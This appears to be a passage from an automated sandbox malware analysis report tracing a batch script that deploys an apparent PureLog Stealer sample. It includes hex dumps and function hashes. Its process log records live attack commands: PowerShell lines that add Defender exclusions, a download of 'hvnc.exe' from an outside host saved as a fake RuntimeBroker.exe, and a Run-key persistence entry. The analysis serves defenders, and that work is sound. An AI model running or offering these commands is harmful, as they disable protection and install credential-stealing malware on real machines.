                        Data Ascii: 073F76531F8CD05DFASystem.IOmscorlibReadThreadLoadCompressionModeDynamicInvokeIDisposableRuntimeFieldHandleRuntimeTypeHandleGetTypeFromHandleValueTypeGetTypeDisposeReverseCreateDelegateCompilerGeneratedAttributeGuidAttributeDebuggableAtt
                        2024-08-06 16:12:11 UTC1369INData Raw: 62 38 37 65 2d 32 61 66 39 36 37 61 30 64 65 38 32 00 00 0c 01 00 07 31 2e 30 2e 30 2e 30 00 00 47 01 00 1a 2e 4e 45 54 46 72 61 6d 65 77 6f 72 6b 2c 56 65 72 73 69 6f 6e 3d 76 34 2e 30 01 00 54 0e 14 46 72 61 6d 65 77 6f 72 6b 44 69 73 70 6c 61 79 4e 61 6d 65 10 2e 4e 45 54 20 46 72 61 6d 65 77 6f 72 6b 20 34 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2b 00 00 00 00 00 00 00 00 00 00 e2 2b 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 2b 00 00 00 00 00 00 00 00 00 00 00 00 5f 43 6f 72 45 78 65 4d 61 69 6e 00 6d 73 63 6f 72 65 65 2e 64 6c 6c 00 00 00 00 00 ff 25 00 20 40 00 00 5a 0d 00 1f 8b 08 00 00 00 00 00 04 00 ec b7 73 70 67 5d d7 36 f8 8b d3 b1 6d 3b
                        Data Ascii: b87e-2af967a0de821.0.0.0G.NETFramework,Version=v4.0TFrameworkDisplayName.NET Framework 4++ +_CorExeMainmscoree.dll% @Zspg]6m;
                        2024-08-06 16:12:11 UTC1369INData Raw: eb 0b bc f0 d0 29 09 ed 9d 09 83 c6 b9 eb a0 ba 71 f8 b9 e1 ad 5b 98 ed cc ec 29 65 30 48 b6 19 fd fa 49 a0 75 37 fa 04 58 c9 2b a3 8b bd a5 e3 d2 e4 b1 c6 54 a6 38 45 94 8c ba 93 11 91 28 6b 73 45 3c 39 55 f2 09 fd bd d0 09 a2 12 78 00 f5 9e 79 0a d7 5e 29 89 2b 61 79 3e 24 23 4d bd f0 d3 e1 a6 82 d1 4e 3e 8f 8a 79 32 cb 6d 6f 24 f5 95 ba 40 0d 06 59 22 05 fe 67 57 7a e1 87 d7 4a f6 f1 84 73 f8 73 f6 69 f3 cf 31 94 f2 c1 d1 db be 18 07 85 04 40 28 3d 50 96 80 58 f5 e2 1b 35 2a 25 61 29 eb b8 6b 9b 9d 41 7b e5 c4 85 fb 61 0f ea 75 db 91 2d 36 cb 6f df d9 16 43 97 c5 cf 4d b4 8d e6 ad d8 3e fc 4e 29 2c ce 86 fc 87 11 35 a8 9c fd e3 98 88 58 ba 23 56 a8 c9 cf 34 79 2f ed 80 ab 1d 98 14 28 3f 2d fe 57 b8 00 a5 c5 1c 2f 9e f4 18 4f 5a 10 2c a9 f6 92 1f 12 6a
                        Data Ascii: )q[)e0HIu7X+T8E(ksE<9Uxy^)+ay>$#MN>y2mo$@Y"gWzJssi1@(=PX5*%a)kA{au-6oCM>N),5X#V4y/(?-W/OZ,j
                        2024-08-06 16:12:11 UTC1369INData Raw: ab f9 56 f0 0d 2b 99 a4 f3 b3 38 a4 f3 a7 70 66 1e 56 9d a1 b4 25 7b 69 bb 48 6d 8a 42 c4 dc b1 94 e1 5c 13 e9 2b 81 56 7c ce b9 a5 64 df ea 1b 9f 89 27 1b f0 1c 8c 08 60 4f be 18 1f f5 db 53 c1 ce 53 ec e0 50 4d 36 f0 ba f6 03 4b 77 c4 b0 ae 01 f1 aa 63 cd 5c 3c 81 93 7f 0d 5c b1 86 fd 6d 6a ec 05 4f 62 ba e4 01 ad d3 d0 8a 17 8d 28 3c 78 54 5c da 37 4b 2d fe b2 07 9d 88 8d 62 ed b1 17 f2 75 22 ae af 97 03 eb ef 21 b7 d5 63 b2 d0 4f 0d cd 63 8b 3b fb 10 e4 09 c8 08 18 b5 2d 7b 38 7b 66 27 f7 0b da 11 3a 55 9b 83 40 41 1b b0 2c 13 c8 08 fd 22 f4 d5 26 6e e4 0f 2d 86 f7 e3 2a 45 49 a7 56 3f f1 9f 34 0d e7 c2 eb 05 b6 9a 96 96 ca c0 b3 83 50 1f ec b9 28 7a 03 2c 25 bc 28 ac b3 69 35 1c 3f 7b 0a a8 fa f7 10 a5 43 2e 36 f2 5c e8 bd e6 39 d8 6a 89 46 87 eb 22
                        Data Ascii: V+8pfV%{iHmB\+V|d'`OSSPM6Kwc\<\mjOb(<xT\7K-bu"!cOc;-{8{f':U@A,"&n-*EIV?4P(z,%(i5?{C.6\9jF"
                        2024-08-06 16:12:11 UTC1369INData Raw: f5 85 b3 2e 12 f6 be 37 73 db 6a 62 59 97 69 16 94 3f 0a b0 c5 dd 87 cc 41 3f 86 9a 1f 6f 8e a0 9c d2 92 cc 45 a7 c7 29 a4 67 0e 23 5f 66 41 19 a1 7d f8 b0 59 e1 6b 14 f1 a1 9e 53 75 54 66 9a 38 fe 20 3f 9d fa 50 d1 5b 8c 38 48 c8 38 55 2f 60 b9 a9 89 ef ea 6c 29 af 2d b6 7b 1b 9c f2 db 56 29 cc 92 29 40 ff b4 91 5c 06 eb 45 0a 9e 85 ef c5 45 ca 0a 9f 06 a0 4f 34 2f cb 94 1a d8 04 25 44 c4 94 57 f2 ae b1 9b e5 e4 7b 06 34 26 44 48 26 d5 d4 82 cb 6f 08 c4 5d 22 aa a7 b3 b3 67 e9 5e 7c 3e 50 5b 0a 37 41 a6 e5 49 d5 ce 71 fb 26 21 4e 9e 9d fd 93 fa 39 61 89 35 79 ba fe 8b 6b d4 86 1c 1c 65 e6 8d 28 05 cf 47 d7 70 0e 80 e2 ae 47 bc 34 03 1c da 8c 77 86 97 d9 fe 55 fb fa 44 fc 4a 3a 4a d1 6a da fd d3 34 cd 3d 1d 07 9c e0 6d 31 2b 8e f9 3b 73 33 33 9e ca b8 f3
                        Data Ascii: .7sjbYi?A?oE)g#_fA}YkSuTf8 ?P[8H8U/`l)-{V))@\EEO4/%DW{4&DH&o]"g^|>P[7AIq&!N9a5yke(GpG4wUDJ:Jj4=m1+;s33
                        2024-08-06 16:12:11 UTC1369INData Raw: 89 ef 8c 30 fd 82 b6 e1 1c 3e 33 4a cc b5 58 b9 63 a7 95 fc e8 49 de 67 c8 01 9f 96 bc 56 ab 66 e3 78 c7 4a 5d b7 ba 6d 4f 6f 74 5d ad fd 8b f7 a3 2d 1c cf ca ab b1 23 2f eb e7 18 59 dd d1 66 6d fa 45 d3 e7 45 cf d6 76 85 c8 79 d0 71 25 eb 34 e1 57 6e 95 9c e3 f6 4f 84 ec 8e 1b e8 40 d2 4b dc 34 93 84 95 15 61 65 56 f3 e6 93 7e 98 1a dd 44 91 3f 98 93 ef af 91 fa 9f 74 4e 1c b9 78 70 fa c2 13 cc e7 40 88 de 47 f0 d0 6f bb eb 4f 9f 98 c4 4e 03 2d 88 07 44 98 bc 94 d5 fa 8c fa cd 1a 0e bb 4f 3e 25 d6 73 69 a4 04 90 d3 ca e2 ea de ac ec 88 08 b6 d5 0b e9 f5 3d 7a b0 05 c3 d3 82 60 54 49 c8 07 7f 1b c8 76 f7 c2 5e 3e 85 33 d3 19 8a bb 36 36 19 30 c5 eb ca 38 ac f8 ac da b2 a0 d1 54 ce e9 43 9e be c8 c4 d5 9d b9 f2 88 44 97 9a 61 2e 77 c7 d5 d4 f7 b4 95 cc 34
                        Data Ascii: 0>3JXcIgVfxJ]mOot]-#/YfmEEvyq%4WnO@K4aeV~D?tNxp@GoON-DO>%si=z`TIv^>36608TCDa.w4
                        2024-08-06 16:12:11 UTC1369INData Raw: 05 8c 24 0a a9 52 51 5a 57 68 03 e3 6d cc 25 dc 33 9d 49 22 d3 81 82 49 1d 33 97 a7 d3 69 e9 1c c7 0d e5 69 66 b3 ba 97 c6 96 f2 d4 e1 8a d9 6f 37 f9 b6 fc 48 2a 22 9d 3f 3e d0 61 ed 15 96 c9 e0 e2 d5 a0 35 a1 4b 51 aa 66 70 5f 37 0b 8a e5 04 57 b2 14 b8 a2 83 90 6d 46 34 f0 ed 8f c2 a3 a7 31 2e 59 4a e6 5b 35 58 20 e4 40 0f 38 8d d0 af 21 0b 38 cf 43 17 07 0e 2d 7c 64 a2 47 01 78 62 07 99 43 cc 47 1d 35 56 20 d5 bd 2d 8a f6 58 32 6d bf e4 ec de 72 78 fb 56 19 08 bc 77 6b db 16 e8 6e b6 28 22 0b dc dd f2 6f 21 fd 14 45 3e 5d 84 1e e6 2b c7 7c 44 8d 2c 80 13 74 68 9b bb 7e 60 a1 00 73 68 ff f0 7d 25 83 0b cd ed 3c f4 71 73 63 a2 6c 73 b6 f2 57 81 2f 6c 26 bf 71 b7 a5 24 e5 4e 87 18 68 30 9f e1 1b f0 1f ec ea 7c 28 3e 3c fd fa 59 ac eb 90 a5 19 bb 62 2c 2f
                        Data Ascii: $RQZWhm%3I"I3iifo7H*"?>a5KQfp_7WmF41.YJ[5X @8!8C-|dGxbCG5V -X2mrxVwkn("o!E>]+|D,th~`sh}%<qsclsW/l&q$Nh0|(><Yb,/
                        2024-08-06 16:12:11 UTC1369INData Raw: 1e 38 9a a0 bd 2e 60 93 59 d1 26 78 34 80 ff e8 57 db 54 5a 64 88 7b e9 a2 9b f3 9e 88 1c 7c 51 9d 22 10 0b 91 ad 1d fb 54 85 b7 ea f4 89 90 13 ad 97 6b 49 3b 76 10 b7 f6 f7 3d 3c 9b 4a 96 40 3c ad f9 68 6d b3 c5 bc 58 df 3d b3 c6 e9 93 99 d2 03 73 9d 90 13 a3 97 98 a9 a8 40 a3 2f db 65 a8 b7 12 22 23 2b 47 33 eb be 3b f3 b4 4c be 55 3a da 61 fa 04 a4 f0 2d c8 94 d5 32 3e a5 fc d6 21 02 4a d8 fa a4 33 49 ad 3b 78 b5 f0 b1 b8 77 63 5a 99 91 de 9e c3 50 a6 25 0d 42 a4 4c 8e 44 f1 76 40 bb 48 33 ee d7 0c f7 a1 64 f9 05 21 a6 6d 95 ad 9d 50 95 f0 bc b4 8b 7a 54 ef ae b6 f3 22 17 91 7f 73 01 26 3a 22 1c 09 96 80 92 73 d8 21 07 9a 9a c4 cd 41 fe b7 08 6b 73 8c 38 51 ef fc 42 11 d0 c7 dc 21 d3 06 17 6a 57 17 dd 75 e6 8c a0 72 96 6e 4c a1 26 e7 95 49 a2 ee 91 21
                        Data Ascii: 8.`Y&x4WTZd{|Q"TkI;v=<J@<hmX=s@/e"#+G3;LU:a-2>!J3I;xwcZP%BLDv@H3d!mPzT"s&:"s!Aks8QB!jWurnL&I!


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:12:11:56
                        Start date:06/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\temp_script.bat" "
                        Imagebase:0x7ff62cd80000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:1
                        Start time:12:11:56
                        Start date:06/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:12:11:57
                        Start date:06/08/2024
                        Path:C:\Windows\System32\cacls.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                        Imagebase:0x7ff709b70000
                        File size:34'304 bytes
                        MD5 hash:A353590E06C976809F14906746109758
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:4
                        Start time:12:11:57
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:12:12:00
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:12:12:02
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:12:12:04
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:12:12:06
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:12:12:08
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
                        Imagebase:0x6a0000
                        File size:449'024 bytes
                        MD5 hash:7557AF6F3185128C25AEB092DC335975
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.3303350593.000000001C600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 66%, ReversingLabs
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:12
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:12:12:11
                        Start date:06/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FF848F10FE2 Relevance: .3, Instructions: 271COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d077ae15da336fa6fe10f0da1a16d74842412fbefdccf63910ae4098e833d6d2
                          • Instruction ID: 11ec300ecd7ad35614afb954bf6262aa703623e626661c9b797e427c89471313
                          • Opcode Fuzzy Hash: d077ae15da336fa6fe10f0da1a16d74842412fbefdccf63910ae4098e833d6d2
                          • Instruction Fuzzy Hash: B5917872E18A4D9EE788EF2C88953ADBBE1FBA9350F40017AD00DD72D6DF7858468750
                          Function 00007FF848FD365D Relevance: 8.1, Strings: 2, Instructions: 5614COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID: H$B_H
                          • API String ID: 0-135228156
                          • Opcode ID: 91a7c149d8f1af77e0a1a8cfb3934536b100e91e9dc1f2f09c36b31fa74b7251
                          • Instruction ID: 81f7a26f2c923cd1dc5648e24b6017a0c6442118c4bd5d9352478dc70c01acf9
                          • Opcode Fuzzy Hash: 91a7c149d8f1af77e0a1a8cfb3934536b100e91e9dc1f2f09c36b31fa74b7251
                          • Instruction Fuzzy Hash: 56734C32F1CD4B1FF6A5F72C046523956D2EFA8690F5905BAD50EC72DAEE28EC014788
                          Function 00007FF848FD533A Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID: H
                          • API String ID: 0-2852464175
                          • Opcode ID: ed756800cfb304a05671ae1f497bcaa19aa89514a617e22ac78e206b054b66f1
                          • Instruction ID: 8b1e0ed36474a47f7376efaf673f2766be5256c90d3ef71e139660c4f78a2d68
                          • Opcode Fuzzy Hash: ed756800cfb304a05671ae1f497bcaa19aa89514a617e22ac78e206b054b66f1
                          • Instruction Fuzzy Hash: 5D418C72B1CE4A1FE695F72C045527966D2EF98280F6801BAD50EC32C6EF29ED028749
                          Function 00007FF848FD69B0 Relevance: .4, Instructions: 429COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39ae18d8f26c7144fc74dcf3edef9a593d9cd7f3a44cd6341950ee148e1fd23e
                          • Instruction ID: 7b3095cf4c994bf83319414368235428eb1693591b1ce0832390f6ed3c733932
                          • Opcode Fuzzy Hash: 39ae18d8f26c7144fc74dcf3edef9a593d9cd7f3a44cd6341950ee148e1fd23e
                          • Instruction Fuzzy Hash: 6AC16931F1DD5B0EEAAABB2C146127D21C2EFA87C4F55017AD54FC32C6EF1DA9024689
                          Function 00007FF848F10C68 Relevance: .3, Instructions: 307COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f168e5c3da3c6fd6d8276d267b16199fc6a8f95ef3df781f952b5048159737c
                          • Instruction ID: 2969cfac3960ef2bf22bed6c67f26769a3675f37a05aceeecba50cb04a1d48ec
                          • Opcode Fuzzy Hash: 6f168e5c3da3c6fd6d8276d267b16199fc6a8f95ef3df781f952b5048159737c
                          • Instruction Fuzzy Hash: 26A18031A189199FDB44FB2CD485BA977E1FF98354F1405BAD41DC7292DF38E8828B84
                          Function 00007FF848F10CB8 Relevance: .3, Instructions: 268COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3305523679.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848f10000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7094d16188875ce0cba9a95b9a0a552c594fada24ac153706671ad79d762f72
                          • Instruction ID: a286621dfb92ade3cf3af817f7eb12898ad983524ec991a91e66b28d73c88371
                          • Opcode Fuzzy Hash: c7094d16188875ce0cba9a95b9a0a552c594fada24ac153706671ad79d762f72
                          • Instruction Fuzzy Hash: 03915F30A189099FEB84FB1CC485BB977E1FB98350F5445BAE41EC7296DF38E8428B44
                          Function 00007FF848FD5091 Relevance: .1, Instructions: 148COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c4623a47a13a65b042529a0deca2a47ed23ad57865e5d33488adec622060f672
                          • Instruction ID: 4b535eb67c24c607c6cf6593c81478982ed0039c9bf2b9a5068382959a893054
                          • Opcode Fuzzy Hash: c4623a47a13a65b042529a0deca2a47ed23ad57865e5d33488adec622060f672
                          • Instruction Fuzzy Hash: AD418032B1CD4B5FF695F72C041527962D2EF98680F9501BAD50EC32C6EE28EC024789
                          Function 00007FF848FD47BD Relevance: .1, Instructions: 147COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e3e84dd2f31cffba7688249f2b906aef3d6fe03eeca3017961c642f19a2ba0b
                          • Instruction ID: f5aed75f6b5f2ba918c23b075d0a17ff79cdfada8f372af7cb8b9567073c07c9
                          • Opcode Fuzzy Hash: 0e3e84dd2f31cffba7688249f2b906aef3d6fe03eeca3017961c642f19a2ba0b
                          • Instruction Fuzzy Hash: A8418131B1CE8A0FE6D5F72C145527966D2EFA8680F6845BAD10EC32C6EF28EC018785
                          Function 00007FF848FD497F Relevance: .1, Instructions: 145COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aeb2f65a7508aaf3ed2f4bb9ce28583395ae8aeb0efd6f2affa2382f5d924410
                          • Instruction ID: 17b5bb5db7a9eee89cbb74796412dcabebc599454c23955d7d040d7182c75f59
                          • Opcode Fuzzy Hash: aeb2f65a7508aaf3ed2f4bb9ce28583395ae8aeb0efd6f2affa2382f5d924410
                          • Instruction Fuzzy Hash: 19418131B1CD4A1FE6D5F72C045527962D2EFE8680F58057AD10ED32D6EE28EC024789
                          Function 00007FF848FD5268 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7f48991fda00168122d72f93e83f97d5c36a1372e5a9a8a146b5284835d12e7
                          • Instruction ID: 750b730d8e24ec43538fcd105f40344096f42dfc620fd5945a26b9e23b53758d
                          • Opcode Fuzzy Hash: c7f48991fda00168122d72f93e83f97d5c36a1372e5a9a8a146b5284835d12e7
                          • Instruction Fuzzy Hash: 28316D32B1CD4A5FE695F72C445527962D2EFE8290F5804BAE50EC72D6EF28E8018785
                          Function 00007FF848FD55F0 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e99af1c23011f271d3dfc9a7afb5559ec1a17593cb0359ead57053a169a3f22
                          • Instruction ID: 89f988c19967f61811b8d211d79c479b6c17517d8f2ea28480ede537905b236a
                          • Opcode Fuzzy Hash: 7e99af1c23011f271d3dfc9a7afb5559ec1a17593cb0359ead57053a169a3f22
                          • Instruction Fuzzy Hash: 13316B31B1CD4A1FE695F72C445527966D2EFE8280F5805BAE50EC32D6FE28EC014789
                          Function 00007FF848FD3A98 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c808bde5421ddbe1904dc857119a4a98587ed35e565d955068ffabaff35bf19e
                          • Instruction ID: ea00151cd0bef3d0b9e678f5f4acec0cdbf6b7bced69dbaf0593d096a28b0d34
                          • Opcode Fuzzy Hash: c808bde5421ddbe1904dc857119a4a98587ed35e565d955068ffabaff35bf19e
                          • Instruction Fuzzy Hash: 64318F31B1CD4E1FE695F72C441523966D2EF98280F5804BAD50EC32D6FF2DE8014785
                          Function 00007FF848FD67A0 Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff848fd0000_RuntimeBroker.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a3b63ab565c1e6be1cab32c6af5a8557f5e157f73b2a03429ff2e6b3bedf696
                          • Instruction ID: ed270e756cd15aec4411b192e0f33b91a37dd5c3068b2a3b43ca4e720ef73b0b
                          • Opcode Fuzzy Hash: 4a3b63ab565c1e6be1cab32c6af5a8557f5e157f73b2a03429ff2e6b3bedf696
                          • Instruction Fuzzy Hash: 73318D31B1CD4E5FE695F72C042527962D2EFA8280F6844BAE10EC72D6EF2CE9014789
                          Function 00007FF848FD65DC Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000B.00000002.3306552912.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
